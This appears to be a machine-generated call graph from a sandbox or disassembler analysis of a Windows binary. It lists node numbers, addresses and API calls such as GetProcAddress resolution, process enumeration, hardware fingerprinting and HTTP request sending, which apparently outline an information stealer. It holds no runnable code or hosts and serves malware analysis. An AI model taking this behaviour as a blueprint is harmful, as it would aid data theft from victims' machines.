80238->80239 80240 4027b8 80239->80240 80241 404239 12 API calls 80240->80241 80242 4027d1 80241->80242 80243 404239 12 API calls 80242->80243 80244 4027ea 80243->80244 80245 404239 12 API calls 80244->80245 80246 402803 80245->80246 80247 404239 12 API calls 80246->80247 80248 40281c 80247->80248 80249 404239 12 API calls 80248->80249 80250 402835 80249->80250 80251 404239 12 API calls 80250->80251 80252 40284e 80251->80252 80253 404239 12 API calls 80252->80253 80254 402867 80253->80254 80255 404239 12 API calls 80254->80255 80256 402880 80255->80256 80257 404239 12 API calls 80256->80257 80258 402899 80257->80258 80259 404239 12 API calls 80258->80259 80260 4028b2 80259->80260 80261 404239 12 API calls 80260->80261 80262 4028cb 80261->80262 80263 404239 12 API calls 80262->80263 80264 4028e4 80263->80264 80265 404239 12 API calls 80264->80265 80266 4028fd 80265->80266 80267 404239 12 API calls 80266->80267 80268 402916 80267->80268 80269 404239 12 API calls 80268->80269 80270 40292f 80269->80270 80271 404239 12 API calls 80270->80271 80272 402948 80271->80272 80273 404239 12 API calls 80272->80273 80274 402961 80273->80274 80275 404239 12 API calls 80274->80275 80276 40297a 80275->80276 80277 404239 12 API calls 80276->80277 80278 402993 80277->80278 80279 404239 12 API calls 80278->80279 80280 4029ac 80279->80280 80281 404239 12 API calls 80280->80281 80282 4029c5 80281->80282 80283 404239 12 API calls 80282->80283 80284 4029de 80283->80284 80285 404239 12 API calls 80284->80285 80286 4029f7 80285->80286 80287 404239 12 API calls 80286->80287 80288 402a10 80287->80288 80289 404239 12 API calls 80288->80289 80290 402a29 80289->80290 80291 404239 12 API calls 80290->80291 80292 402a42 80291->80292 80293 404239 12 API calls 80292->80293 80294 402a5b 80293->80294 80295 404239 12 API calls 80294->80295 80296 402a74 80295->80296 80297 404239 12 API calls 80296->80297 80298 402a8d 80297->80298 80299 404239 12 API calls 80298->80299 80300 402aa6 80299->80300 80301 404239 12 API calls 80300->80301 80302 402abf 80301->80302 80303 404239 12 API calls 80302->80303 80304 402ad8 80303->80304 80305 404239 12 API calls 80304->80305 80306 402af1 80305->80306 80307 404239 12 API calls 80306->80307 80308 402b0a 80307->80308 80309 404239 12 API calls 80308->80309 80310 402b23 80309->80310 80311 404239 12 API calls 80310->80311 80312 402b3c 80311->80312 80313 404239 12 API calls 80312->80313 80314 402b55 80313->80314 80315 404239 12 API calls 80314->80315 80316 402b6e 80315->80316 80317 404239 12 API calls 80316->80317 80318 402b87 80317->80318 80319 404239 12 API calls 80318->80319 80320 402ba0 80319->80320 80321 404239 12 API calls 80320->80321 80322 402bb9 80321->80322 80323 404239 12 API calls 80322->80323 80324 402bd2 80323->80324 80325 404239 12 API calls 80324->80325 80326 402beb 80325->80326 80327 404239 12 API calls 80326->80327 80328 402c04 80327->80328 80329 404239 12 API calls 80328->80329 80330 402c1d 80329->80330 80331 404239 12 API calls 80330->80331 80332 402c36 80331->80332 80333 404239 12 API calls 80332->80333 80334 402c4f 80333->80334 80335 404239 12 API calls 80334->80335 80336 402c68 80335->80336 80337 404239 12 API calls 80336->80337 80338 402c81 80337->80338 80339 404239 12 API calls 80338->80339 80340 402c9a 80339->80340 80341 404239 12 API calls 80340->80341 80342 402cb3 80341->80342 80343 404239 12 API calls 80342->80343 80344 402ccc 80343->80344 80345 404239 12 API calls 80344->80345 80346 402ce5 80345->80346 80347 404239 12 API calls 80346->80347 80348 402cfe 80347->80348 80349 404239 12 API calls 80348->80349 80350 402d17 80349->80350 80351 404239 12 API calls 80350->80351 80352 402d30 80351->80352 80353 404239 12 API calls 80352->80353 80354 402d49 80353->80354 80355 404239 12 API calls 80354->80355 80356 402d62 80355->80356 80357 404239 12 API calls 80356->80357 80358 402d7b 80357->80358 80359 404239 12 API calls 80358->80359 80360 402d94 80359->80360 80361 404239 12 API calls 80360->80361 80362 402dad 80361->80362 80363 404239 12 API calls 80362->80363 80364 402dc6 80363->80364 80365 404239 12 API calls 80364->80365 80366 402ddf 80365->80366 80367 404239 12 API calls 80366->80367 80368 402df8 80367->80368 80369 404239 12 API calls 80368->80369 80370 402e11 80369->80370 80371 404239 12 API calls 80370->80371 80372 402e2a 80371->80372 80373 404239 12 API calls 80372->80373 80374 402e43 80373->80374 80375 404239 12 API calls 80374->80375 80376 402e5c 80375->80376 80377 404239 12 API calls 80376->80377 80378 402e75 80377->80378 80379 404239 12 API calls 80378->80379 80380 402e8e 80379->80380 80381 404239 12 API calls 80380->80381 80382 402ea7 80381->80382 80383 404239 12 API calls 80382->80383 80384 402ec0 80383->80384 80385 404239 12 API calls 80384->80385 80386 402ed9 80385->80386 80387 404239 12 API calls 80386->80387 80388 402ef2 80387->80388 80389 404239 12 API calls 80388->80389 80390 402f0b 80389->80390 80391 404239 12 API calls 80390->80391 80392 402f24 80391->80392 80393 404239 12 API calls 80392->80393 80394 402f3d 80393->80394 80395 404239 12 API calls 80394->80395 80396 402f56 80395->80396 80397 404239 12 API calls 80396->80397 80398 402f6f 80397->80398 80399 404239 12 API calls 80398->80399 80400 402f88 80399->80400 80401 404239 12 API calls 80400->80401 80402 402fa1 80401->80402 80403 404239 12 API calls 80402->80403 80404 402fba 80403->80404 80405 404239 12 API calls 80404->80405 80406 402fd3 80405->80406 80407 404239 12 API calls 80406->80407 80408 402fec 80407->80408 80409 404239 12 API calls 80408->80409 80410 403005 80409->80410 80411 404239 12 API calls 80410->80411 80412 40301e 80411->80412 80413 404239 12 API calls 80412->80413 80414 403037 80413->80414 80415 404239 12 API calls 80414->80415 80416 403050 80415->80416 80417 404239 12 API calls 80416->80417 80418 403069 80417->80418 80419 404239 12 API calls 80418->80419 80420 403082 80419->80420 80421 404239 12 API calls 80420->80421 80422 40309b 80421->80422 80423 404239 12 API calls 80422->80423 80424 4030b4 80423->80424 80425 404239 12 API calls 80424->80425 80426 4030cd 80425->80426 80427 404239 12 API calls 80426->80427 80428 4030e6 80427->80428 80429 404239 12 API calls 80428->80429 80430 4030ff 80429->80430 80431 404239 12 API calls 80430->80431 80432 403118 80431->80432 80433 404239 12 API calls 80432->80433 80434 403131 80433->80434 80435 404239 12 API calls 80434->80435 80436 40314a 80435->80436 80437 404239 12 API calls 80436->80437 80438 403163 80437->80438 80439 404239 12 API calls 80438->80439 80440 40317c 80439->80440 80441 404239 12 API calls 80440->80441 80442 403195 80441->80442 80443 404239 12 API calls 80442->80443 80444 4031ae 80443->80444 80445 404239 12 API calls 80444->80445 80446 4031c7 80445->80446 80447 404239 12 API calls 80446->80447 80448 4031e0 80447->80448 80449 404239 12 API calls 80448->80449 80450 4031f9 80449->80450 80451 404239 12 API calls 80450->80451 80452 403212 80451->80452 80453 404239 12 API calls 80452->80453 80454 40322b 80453->80454 80455 404239 12 API calls 80454->80455 80456 403244 80455->80456 80457 404239 12 API calls 80456->80457 80458 40325d 80457->80458 80459 404239 12 API calls 80458->80459 80460 403276 80459->80460 80461 404239 12 API calls 80460->80461 80462 40328f 80461->80462 80463 404239 12 API calls 80462->80463 80464 4032a8 80463->80464 80465 404239 12 API calls 80464->80465 80466 4032c1 80465->80466 80467 404239 12 API calls 80466->80467 80468 4032da 80467->80468 80469 404239 12 API calls 80468->80469 80470 4032f3 80469->80470 80471 404239 12 API calls 80470->80471 80472 40330c 80471->80472 80473 404239 12 API calls 80472->80473 80474 403325 80473->80474 80475 404239 12 API calls 80474->80475 80476 40333e 80475->80476 80477 404239 12 API calls 80476->80477 80478 403357 80477->80478 80479 404239 12 API calls 80478->80479 80480 403370 80479->80480 80481 404239 12 API calls 80480->80481 80482 403389 80481->80482 80483 404239 12 API calls 80482->80483 80484 4033a2 80483->80484 80485 404239 12 API calls 80484->80485 80486 4033bb 80485->80486 80487 404239 12 API calls 80486->80487 80488 4033d4 80487->80488 80489 404239 12 API calls 80488->80489 80490 4033ed 80489->80490 80491 404239 12 API calls 80490->80491 80492 403406 80491->80492 80493 404239 12 API calls 80492->80493 80494 40341f 80493->80494 80495 404239 12 API calls 80494->80495 80496 403438 80495->80496 80497 404239 12 API calls 80496->80497 80498 403451 80497->80498 80499 404239 12 API calls 80498->80499 80500 40346a 80499->80500 80501 404239 12 API calls 80500->80501 80502 403483 80501->80502 80503 404239 12 API calls 80502->80503 80504 40349c 80503->80504 80505 404239 12 API calls 80504->80505 80506 4034b5 80505->80506 80507 404239 12 API calls 80506->80507 80508 4034ce 80507->80508 80509 404239 12 API calls 80508->80509 80510 4034e7 80509->80510 80511 404239 12 API calls 80510->80511 80512 403500 80511->80512 80513 404239 12 API calls 80512->80513 80514 403519 80513->80514 80515 404239 12 API calls 80514->80515 80516 403532 80515->80516 80517 404239 12 API calls 80516->80517 80518 40354b 80517->80518 80519 404239 12 API calls 80518->80519 80520 403564 80519->80520 80521 404239 12 API calls 80520->80521 80522 40357d 80521->80522 80523 404239 12 API calls 80522->80523 80524 403596 80523->80524 80525 404239 12 API calls 80524->80525 80526 4035af 80525->80526 80527 404239 12 API calls 80526->80527 80528 4035c8 80527->80528 80529 404239 12 API calls 80528->80529 80530 4035e1 80529->80530 80531 404239 12 API calls 80530->80531 80532 4035fa 80531->80532 80533 404239 12 API calls 80532->80533 80534 403613 80533->80534 80535 404239 12 API calls 80534->80535 80536 40362c 80535->80536 80537 404239 12 API calls 80536->80537 80538 403645 80537->80538 80539 404239 12 API calls 80538->80539 80540 40365e 80539->80540 80541 404239 12 API calls 80540->80541 80542 403677 80541->80542 80543 404239 12 API calls 80542->80543 80544 403690 80543->80544 80545 404239 12 API calls 80544->80545 80546 4036a9 80545->80546 80547 404239 12 API calls 80546->80547 80548 4036c2 80547->80548 80549 404239 12 API calls 80548->80549 80550 4036db 80549->80550 80551 404239 12 API calls 80550->80551 80552 4036f4 80551->80552 80553 404239 12 API calls 80552->80553 80554 40370d 80553->80554 80555 404239 12 API calls 80554->80555 80556 403726 80555->80556 80557 404239 12 API calls 80556->80557 80558 40373f 80557->80558 80559 404239 12 API calls 80558->80559 80560 403758 80559->80560 80561 404239 12 API calls 80560->80561 80562 403771 80561->80562 80563 404239 12 API calls 80562->80563 80564 40378a 80563->80564 80565 404239 12 API calls 80564->80565 80566 4037a3 80565->80566 80567 404239 12 API calls 80566->80567 80568 4037bc 80567->80568 80569 404239 12 API calls 80568->80569 80570 4037d5 80569->80570 80571 404239 12 API calls 80570->80571 80572 4037ee 80571->80572 80573 404239 12 API calls 80572->80573 80574 403807 80573->80574 80575 404239 12 API calls 80574->80575 80576 403820 80575->80576 80577 404239 12 API calls 80576->80577 80578 403839 80577->80578 80579 404239 12 API calls 80578->80579 80580 403852 80579->80580 80581 404239 12 API calls 80580->80581 80582 40386b 80581->80582 80583 404239 12 API calls 80582->80583 80584 403884 80583->80584 80585 404239 12 API calls 80584->80585 80586 40389d 80585->80586 80587 404239 12 API calls 80586->80587 80588 4038b6 80587->80588 80589 404239 12 API calls 80588->80589 80590 4038cf 80589->80590 80591 404239 12 API calls 80590->80591 80592 4038e8 80591->80592 80593 404239 12 API calls 80592->80593 80594 403901 80593->80594 80595 404239 12 API calls 80594->80595 80596 40391a 80595->80596 80597 404239 12 API calls 80596->80597 80598 403933 80597->80598 80599 404239 12 API calls 80598->80599 80600 40394c 80599->80600 80601 404239 12 API calls 80600->80601 80602 403965 80601->80602 80603 404239 12 API calls 80602->80603 80604 40397e 80603->80604 80605 404239 12 API calls 80604->80605 80606 403997 80605->80606 80607 404239 12 API calls 80606->80607 80608 4039b0 80607->80608 80609 404239 12 API calls 80608->80609 80610 4039c9 80609->80610 80611 404239 12 API calls 80610->80611 80612 4039e2 80611->80612 80613 404239 12 API calls 80612->80613 80614 4039fb 80613->80614 80615 404239 12 API calls 80614->80615 80616 403a14 80615->80616 80617 404239 12 API calls 80616->80617 80618 403a2d 80617->80618 80619 404239 12 API calls 80618->80619 80620 403a46 80619->80620 80621 404239 12 API calls 80620->80621 80622 403a5f 80621->80622 80623 404239 12 API calls 80622->80623 80624 403a78 80623->80624 80625 404239 12 API calls 80624->80625 80626 403a91 80625->80626 80627 404239 12 API calls 80626->80627 80628 403aaa 80627->80628 80629 404239 12 API calls 80628->80629 80630 403ac3 80629->80630 80631 404239 12 API calls 80630->80631 80632 403adc 80631->80632 80633 404239 12 API calls 80632->80633 80634 403af5 80633->80634 80635 404239 12 API calls 80634->80635 80636 403b0e 80635->80636 80637 404239 12 API calls 80636->80637 80638 403b27 80637->80638 80639 404239 12 API calls 80638->80639 80640 403b40 80639->80640 80641 404239 12 API calls 80640->80641 80642 403b59 80641->80642 80643 404239 12 API calls 80642->80643 80644 403b72 80643->80644 80645 404239 12 API calls 80644->80645 80646 403b8b 80645->80646 80647 404239 12 API calls 80646->80647 80648 403ba4 80647->80648 80649 404239 12 API calls 80648->80649 80650 403bbd 80649->80650 80651 404239 12 API calls 80650->80651 80652 403bd6 80651->80652 80653 404239 12 API calls 80652->80653 80654 403bef 80653->80654 80655 404239 12 API calls 80654->80655 80656 403c08 80655->80656 80657 404239 12 API calls 80656->80657 80658 403c21 80657->80658 80659 404239 12 API calls 80658->80659 80660 403c3a 80659->80660 80661 404239 12 API calls 80660->80661 80662 403c53 80661->80662 80663 404239 12 API calls 80662->80663 80664 403c6c 80663->80664 80665 404239 12 API calls 80664->80665 80666 403c85 80665->80666 80667 404239 12 API calls 80666->80667 80668 403c9e 80667->80668 80669 404239 12 API calls 80668->80669 80670 403cb7 80669->80670 80671 404239 12 API calls 80670->80671 80672 403cd0 80671->80672 80673 404239 12 API calls 80672->80673 80674 403ce9 80673->80674 80675 404239 12 API calls 80674->80675 80676 403d02 80675->80676 80677 404239 12 API calls 80676->80677 80678 403d1b 80677->80678 80679 404239 12 API calls 80678->80679 80680 403d34 80679->80680 80681 404239 12 API calls 80680->80681 80682 403d4d 80681->80682 80683 404239 12 API calls 80682->80683 80684 403d66 80683->80684 80685 404239 12 API calls 80684->80685 80686 403d7f 80685->80686 80687 404239 12 API calls 80686->80687 80688 403d98 80687->80688 80689 404239 12 API calls 80688->80689 80690 403db1 80689->80690 80691 404239 12 API calls 80690->80691 80692 403dca 80691->80692 80693 404239 12 API calls 80692->80693 80694 403de3 80693->80694 80695 404239 12 API calls 80694->80695 80696 403dfc 80695->80696 80697 404239 12 API calls 80696->80697 80698 403e15 80697->80698 80699 404239 12 API calls 80698->80699 80700 403e2e 80699->80700 80701 404239 12 API calls 80700->80701 80702 403e47 80701->80702 80703 404239 12 API calls 80702->80703 80704 403e60 80703->80704 80705 404239 12 API calls 80704->80705 80706 403e79 80705->80706 80707 404239 12 API calls 80706->80707 80708 403e92 80707->80708 80709 404239 12 API calls 80708->80709 80710 403eab 80709->80710 80711 404239 12 API calls 80710->80711 80712 403ec4 80711->80712 80713 404239 12 API calls 80712->80713 80714 403edd 80713->80714 80715 404239 12 API calls 80714->80715 80716 403ef6 80715->80716 80717 404239 12 API calls 80716->80717 80718 403f0f 80717->80718 80719 404239 12 API calls 80718->80719 80720 403f28 80719->80720 80721 404239 12 API calls 80720->80721 80722 403f41 80721->80722 80723 404239 12 API calls 80722->80723 80724 403f5a 80723->80724 80725 404239 12 API calls 80724->80725 80726 403f73 80725->80726 80727 404239 12 API calls 80726->80727 80728 403f8c 80727->80728 80729 404239 12 API calls 80728->80729 80730 403fa5 80729->80730 80731 404239 12 API calls 80730->80731 80732 403fbe 80731->80732 80733 404239 12 API calls 80732->80733 80734 403fd7 80733->80734 80735 404239 12 API calls 80734->80735 80736 403ff0 80735->80736 80737 404239 12 API calls 80736->80737 80738 404009 80737->80738 80739 404239 12 API calls 80738->80739 80740 404022 80739->80740 80741 404239 12 API calls 80740->80741 80742 40403b 80741->80742 80743 404239 12 API calls 80742->80743 80744 404054 80743->80744 80745 404239 12 API calls 80744->80745 80746 40406d 80745->80746 80747 404239 12 API calls 80746->80747 80748 404086 80747->80748 80749 404239 12 API calls 80748->80749 80750 40409f 80749->80750 80751 404239 12 API calls 80750->80751 80752 4040b8 80751->80752 80753 404239 12 API calls 80752->80753 80754 4040d1 80753->80754 80755 404239 12 API calls 80754->80755 80756 4040ea 80755->80756 80757 404239 12 API calls 80756->80757 80758 404103 80757->80758 80759 404239 12 API calls 80758->80759 80760 40411c 80759->80760 80761 404239 12 API calls 80760->80761 80762 404135 80761->80762 80763 404239 12 API calls 80762->80763 80764 40414e 80763->80764 80765 404239 12 API calls 80764->80765 80766 404167 80765->80766 80767 404239 12 API calls 80766->80767 80768 404180 80767->80768 80769 404239 12 API calls 80768->80769 80770 404199 80769->80770 80771 404239 12 API calls 80770->80771 80772 4041b2 80771->80772 80773 404239 12 API calls 80772->80773 80774 4041cb 80773->80774 80775 404239 12 API calls 80774->80775 80776 4041e4 80775->80776 80777 404239 12 API calls 80776->80777 80778 4041fd 80777->80778 80779 404239 12 API calls 80778->80779 80780 404216 80779->80780 80781 404239 12 API calls 80780->80781 80782 40422f 80781->80782 80783 41b050 80782->80783 80784 41b060 50 API calls 80783->80784 80785 41b4d7 9 API calls 80783->80785 80784->80785 80786 41b578 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 80785->80786 80787 41b5eb 80785->80787 80786->80787 80788 41b6b0 80787->80788 80789 41b5f8 8 API calls 80787->80789 80790 41b6b9 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 80788->80790 80791 41b72c 80788->80791 80789->80788 80790->80791 80792 41b7c3 80791->80792 80793 41b739 6 API calls 80791->80793 80794 41b7d0 9 API calls 80792->80794 80795 41b89f 80792->80795 80793->80792 80794->80795 80796 41b8a8 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 80795->80796 80797 41b91b 80795->80797 80796->80797 80798 41b952 80797->80798 80799 41b924 GetProcAddress GetProcAddress 80797->80799 80800 41b989 80798->80800 80801 41b95b GetProcAddress GetProcAddress 80798->80801 80799->80798 80802 41b996 10 API calls 80800->80802 80803 41ba7a 80800->80803 80801->80800 80802->80803 80804 41ba83 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 80803->80804 80805 41badf 80803->80805 80804->80805 80806 41bae8 GetProcAddress 80805->80806 80807 41baff 80805->80807 80806->80807 80808 41bb64 80807->80808 80809 41bb08 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 80807->80809 80810 41bb83 80808->80810 80811 41bb6d GetProcAddress 80808->80811 80809->80808 80810->79843 80811->80810 80813 413940 FindCloseChangeNotification 80812->80813 80814 413912 Process32Next 80812->80814 80816 41395c 80813->80816 80814->80813 80815 413926 StrCmpCA 80814->80815 80817 41393a 80815->80817 80816->80040 80818 4216c8 80816->80818 80817->80814 82023 4214fa 80818->82023 80820 4216db 80820->80040 80822 411668 lstrcpyA 80821->80822 80823 412d78 80822->80823 80824 411668 lstrcpyA 80823->80824 80825 412d86 GetSystemTime 80824->80825 80826 412d9d 80825->80826 80827 4116b4 lstrcpyA 80826->80827 80828 412df5 80827->80828 80828->79846 80830 4117f1 80829->80830 80831 411840 80830->80831 80833 411824 lstrcpyA lstrcatA 80830->80833 80832 4116b4 lstrcpyA 80831->80832 80834 41184c 80832->80834 80833->80831 80834->79863 80836 4116b4 lstrcpyA 80835->80836 80837 40135e 80836->80837 80838 4116b4 lstrcpyA 80837->80838 80839 401370 80838->80839 80840 4116b4 lstrcpyA 80839->80840 80841 401382 80840->80841 80842 4116b4 lstrcpyA 80841->80842 80843 4013ac 80842->80843 80844 418167 80843->80844 80845 418178 80844->80845 80846 411715 2 API calls 80845->80846 80847 418185 80846->80847 80848 411715 2 API calls 80847->80848 80849 418192 80848->80849 80850 411715 2 API calls 80849->80850 80851 41819f 80850->80851 80852 411668 lstrcpyA 80851->80852 80853 4181ac 80852->80853 80854 411668 lstrcpyA 80853->80854 80855 4181b9 80854->80855 80856 411668 lstrcpyA 80855->80856 80857 4181c6 80856->80857 80858 411668 lstrcpyA 80857->80858 80859 4181d3 80858->80859 80860 411668 lstrcpyA 80859->80860 80861 4181e0 80860->80861 80862 411668 lstrcpyA 80861->80862 80930 4181ed 80862->80930 80863 402282 lstrcpyA 80863->80930 80864 4022c1 lstrcpyA 80864->80930 80865 417f35 28 API calls 80865->80930 80866 4182bc StrCmpCA 80866->80930 80867 418320 StrCmpCA 80868 418469 80867->80868 80867->80930 80869 41177a lstrcpyA 80868->80869 80870 418475 80869->80870 82046 4022c1 80870->82046 80873 41177a lstrcpyA 80875 41848b 80873->80875 80874 418518 StrCmpCA 80877 418661 80874->80877 80874->80930 82049 40230f lstrcpyA 80875->82049 80876 402297 lstrcpyA 80876->80930 80878 41177a lstrcpyA 80877->80878 80879 41866d 80878->80879 80882 4022c1 lstrcpyA 80879->80882 80880 4022ac lstrcpyA 80880->80930 80885 418679 80882->80885 80883 4184a2 80884 41177a lstrcpyA 80883->80884 80886 4184ac 80884->80886 80887 41177a lstrcpyA 80885->80887 82050 418c28 lstrcpyA 80886->82050 80889 418683 80887->80889 80888 418710 StrCmpCA 80890 418859 80888->80890 80888->80930 82051 40230f lstrcpyA 80889->82051 80892 41177a lstrcpyA 80890->80892 80896 418865 80892->80896 80893 41177a lstrcpyA 80893->80930 80894 4022eb lstrcpyA 80894->80930 82053 4022d6 lstrcpyA 80896->82053 80897 41869a 80899 41177a lstrcpyA 80897->80899 80901 4186a4 80899->80901 80900 418871 80902 41177a lstrcpyA 80900->80902 82052 418c28 lstrcpyA 80901->82052 80905 41887b 80902->80905 80903 41840d StrCmpCA 80903->80930 80904 418908 StrCmpCA 80906 418a51 80904->80906 80904->80930 82054 402324 lstrcpyA 80905->82054 80907 41177a lstrcpyA 80906->80907 80910 418a5d 80907->80910 82056 4022d6 lstrcpyA 80910->82056 80911 418892 80914 41177a lstrcpyA 80911->80914 80913 4116b4 lstrcpyA 80913->80930 80916 41889c 80914->80916 80915 418a69 80917 41177a lstrcpyA 80915->80917 82055 418c28 lstrcpyA 80916->82055 80920 418a73 80917->80920 80918 418605 StrCmpCA 80918->80930 80919 418b00 StrCmpCA 80921 418b20 80919->80921 80922 418b0b Sleep 80919->80922 82057 402324 lstrcpyA 80920->82057 80925 41177a lstrcpyA 80921->80925 80922->80930 80924 4184c3 80924->79878 80926 418b2c 80925->80926 82059 4022d6 lstrcpyA 80926->82059 80929 418a8a 80932 41177a lstrcpyA 80929->80932 80930->80863 80930->80864 80930->80865 80930->80866 80930->80867 80930->80874 80930->80876 80930->80880 80930->80888 80930->80893 80930->80894 80930->80903 80930->80904 80930->80913 80930->80918 80930->80919 80935 4022d6 lstrcpyA 80930->80935 80936 4187fd StrCmpCA 80930->80936 80943 4189f5 StrCmpCA 80930->80943 80944 417e48 23 API calls 80930->80944 80946 40134c lstrcpyA 80930->80946 80931 418b38 80933 41177a lstrcpyA 80931->80933 80934 418a94 80932->80934 80937 418b42 80933->80937 82058 418c28 lstrcpyA 80934->82058 80935->80930 80936->80930 82060 4022d6 lstrcpyA 80937->82060 80940 418b59 80941 41177a lstrcpyA 80940->80941 80942 418b63 80941->80942 82061 418c28 lstrcpyA 80942->82061 80943->80930 80944->80930 80946->80930 80948 41177a lstrcpyA 80947->80948 80949 41a4dd 80948->80949 80950 41177a lstrcpyA 80949->80950 80951 41a4ef 80950->80951 80952 41177a lstrcpyA 80951->80952 80953 41a501 80952->80953 80953->79880 80954->79913 80956 411975 GetVolumeInformationA 80955->80956 80957 41196e 80955->80957 80958 4119b3 80956->80958 80957->80956 80959 411a11 GetProcessHeap HeapAlloc 80958->80959 80960 411a40 wsprintfA lstrcatA 80959->80960 80961 411a2e 80959->80961 82062 412667 GetCurrentHwProfileA 80960->82062 80963 411668 lstrcpyA 80961->80963 80965 411a38 80963->80965 80964 411a74 80966 411a7d lstrlenA 80964->80966 80965->79927 80967 411a91 80966->80967 82068 4136ce lstrcpyA malloc strncpy 80967->82068 80969 411a9e 80970 411aa8 lstrcatA 80969->80970 80971 411abd 80970->80971 80972 411668 lstrcpyA 80971->80972 80973 411ad0 80972->80973 80973->80965 80975 4116b4 lstrcpyA 80974->80975 80976 404413 80975->80976 82069 40430f 80976->82069 80978 40441f 80979 411668 lstrcpyA 80978->80979 80980 40444d 80979->80980 80981 411668 lstrcpyA 80980->80981 80982 40445a 80981->80982 80983 411668 lstrcpyA 80982->80983 80984 404467 80983->80984 80985 411668 lstrcpyA 80984->80985 80986 404474 80985->80986 80987 411668 lstrcpyA 80986->80987 80988 404481 80987->80988 80989 404491 InternetOpenA StrCmpCA 80988->80989 80990 4044bc 80989->80990 80991 404a55 InternetCloseHandle 80990->80991 80992 412d64 3 API calls 80990->80992 80996 404a69 ctype 80991->80996 80993 4044db 80992->80993 80994 4117e0 3 API calls 80993->80994 80995 4044ed 80994->80995 80997 41177a lstrcpyA 80995->80997 80998 4116b4 lstrcpyA 80996->80998 80999 4044f6 80997->80999 81010 404a83 80998->81010 81000 41185b 4 API calls 80999->81000 81001 404520 81000->81001 81002 41177a lstrcpyA 81001->81002 81003 404529 81002->81003 81004 41185b 4 API calls 81003->81004 81005 404548 81004->81005 81006 41177a lstrcpyA 81005->81006 81007 404551 81006->81007 81008 4117e0 3 API calls 81007->81008 81009 40456f 81008->81009 81011 41177a lstrcpyA 81009->81011 81010->79931 81012 404578 81011->81012 81013 41185b 4 API calls 81012->81013 81014 404597 81013->81014 81015 41177a lstrcpyA 81014->81015 81016 4045a0 81015->81016 81017 41185b 4 API calls 81016->81017 81018 4045bf 81017->81018 81019 41177a lstrcpyA 81018->81019 81020 4045c8 81019->81020 81021 41185b 4 API calls 81020->81021 81022 4045f3 81021->81022 81023 4117e0 3 API calls 81022->81023 81024 4045fa 81023->81024 81025 41177a lstrcpyA 81024->81025 81026 404603 81025->81026 81027 404619 InternetConnectA 81026->81027 81027->80991 81028 404645 HttpOpenRequestA 81027->81028 81030 404695 81028->81030 81031 404a49 InternetCloseHandle 81028->81031 81032 4046c0 81030->81032 81033 40469b InternetSetOptionA 81030->81033 81031->80991 81034 41185b 4 API calls 81032->81034 81033->81032 81035 4046d4 81034->81035 81036 41177a lstrcpyA 81035->81036 81037 4046dd 81036->81037 81038 4117e0 3 API calls 81037->81038 81039 4046fb 81038->81039 81040 41177a lstrcpyA 81039->81040 81041 404704 81040->81041 81042 41185b 4 API calls 81041->81042 81043 404723 81042->81043 81044 41177a lstrcpyA 81043->81044 81045 40472c 81044->81045 81046 41185b 4 API calls 81045->81046 81047 40474c 81046->81047 81048 41177a lstrcpyA 81047->81048 81049 404755 81048->81049 81050 41185b 4 API calls 81049->81050 81051 404774 81050->81051 81052 41177a lstrcpyA 81051->81052 81053 40477d 81052->81053 81054 41185b 4 API calls 81053->81054 81055 40479c 81054->81055 81056 41177a lstrcpyA 81055->81056 81057 4047a5 81056->81057 81058 4117e0 3 API calls 81057->81058 81059 4047c3 81058->81059 81060 41177a lstrcpyA 81059->81060 81061 4047cc 81060->81061 81062 41185b 4 API calls 81061->81062 81063 4047eb 81062->81063 81064 41177a lstrcpyA 81063->81064 81065 4047f4 81064->81065 81066 41185b 4 API calls 81065->81066 81067 404813 81066->81067 81068 41177a lstrcpyA 81067->81068 81069 40481c 81068->81069 81070 4117e0 3 API calls 81069->81070 81071 40483a 81070->81071 81072 41177a lstrcpyA 81071->81072 81073 404843 81072->81073 81074 41185b 4 API calls 81073->81074 81075 404862 81074->81075 81076 41177a lstrcpyA 81075->81076 81077 40486b 81076->81077 81078 41185b 4 API calls 81077->81078 81079 40488b 81078->81079 81080 41177a lstrcpyA 81079->81080 81081 404894 81080->81081 81082 41185b 4 API calls 81081->81082 81083 4048b3 81082->81083 81084 41177a lstrcpyA 81083->81084 81085 4048bc 81084->81085 81086 41185b 4 API calls 81085->81086 81087 4048db 81086->81087 81088 41177a lstrcpyA 81087->81088 81089 4048e4 81088->81089 81090 4117e0 3 API calls 81089->81090 81091 404902 81090->81091 81092 41177a lstrcpyA 81091->81092 81093 40490b 81092->81093 81094 411668 lstrcpyA 81093->81094 81095 404926 81094->81095 81096 4117e0 3 API calls 81095->81096 81097 404947 81096->81097 81098 4117e0 3 API calls 81097->81098 81099 40494e 81098->81099 81100 41177a lstrcpyA 81099->81100 81101 40495a 81100->81101 81102 40497b lstrlenA 81101->81102 81103 40498e 81102->81103 81104 404997 lstrlenA 81103->81104 82077 41193a 81104->82077 81106 4049a7 HttpSendRequestA 81107 4049bf InternetReadFile 81106->81107 81108 4049f3 InternetCloseHandle 81107->81108 81113 4049ea 81107->81113 82078 411701 81108->82078 81111 41185b 4 API calls 81111->81113 81112 41177a lstrcpyA 81112->81113 81113->81107 81113->81108 81113->81111 81113->81112 82082 41193a 81114->82082 81116 414fb0 StrCmpCA 81117 414fc3 81116->81117 81118 414fbb ExitProcess 81116->81118 81119 414fd3 strtok_s 81117->81119 81132 414fdf 81119->81132 81120 4151a9 81120->79934 81121 415188 strtok_s 81121->81132 81122 4150a1 StrCmpCA 81122->81132 81123 4150e3 StrCmpCA 81123->81132 81124 415163 StrCmpCA 81124->81132 81125 4150c2 StrCmpCA 81125->81132 81126 415104 StrCmpCA 81126->81132 81127 41502b StrCmpCA 81127->81132 81128 41512b StrCmpCA 81128->81132 81129 41500a StrCmpCA 81129->81132 81130 41506d StrCmpCA 81130->81132 81131 41504c StrCmpCA 81131->81132 81132->81120 81132->81121 81132->81122 81132->81123 81132->81124 81132->81125 81132->81126 81132->81127 81132->81128 81132->81129 81132->81130 81132->81131 81133 411715 2 API calls 81132->81133 81133->81132 81135 4116b4 lstrcpyA 81134->81135 81136 4058dd 81135->81136 81137 40430f 5 API calls 81136->81137 81138 4058e9 81137->81138 81139 411668 lstrcpyA 81138->81139 81140 40591a 81139->81140 81141 411668 lstrcpyA 81140->81141 81142 405927 81141->81142 81143 411668 lstrcpyA 81142->81143 81144 405934 81143->81144 81145 411668 lstrcpyA 81144->81145 81146 405941 81145->81146 81147 411668 lstrcpyA 81146->81147 81148 40594e 